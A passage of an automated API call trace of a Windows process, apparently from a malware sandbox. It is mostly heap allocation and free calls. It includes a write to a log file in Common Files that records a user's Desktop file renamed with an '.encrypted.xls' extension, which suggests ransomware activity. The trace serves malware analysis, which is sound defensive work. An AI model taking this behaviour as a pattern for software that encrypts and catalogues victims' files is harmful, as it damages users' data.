dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x180) returned 0x7c50e0 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.476] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.476] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.476] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.476] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.476] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.476] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.476] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x853, lpOverlapped=0x0) returned 1 [0031.477] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.477] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x853, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.477] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.encrypted.xls\r\n", cchWideChar=101, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0031.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x65) returned 0x7c10a8 [0031.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.encrypted.xls\r\n", cchWideChar=101, lpMultiByteStr=0x7c10a8, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.encrypted.xls\r\n", lpUsedDefaultChar=0x0) returned 101 [0031.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0031.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0031.477] WriteFile (in: hFile=0x128, lpBuffer=0x7db300*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db300*, lpNumberOfBytesWritten=0x6aee3c*=0x64, lpOverlapped=0x0) returned 1 [0031.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0031.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.479] CloseHandle (hObject=0x128) returned 1 [0031.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.480] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.480] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.481] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.481] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.481] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.481] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.482] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.484] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 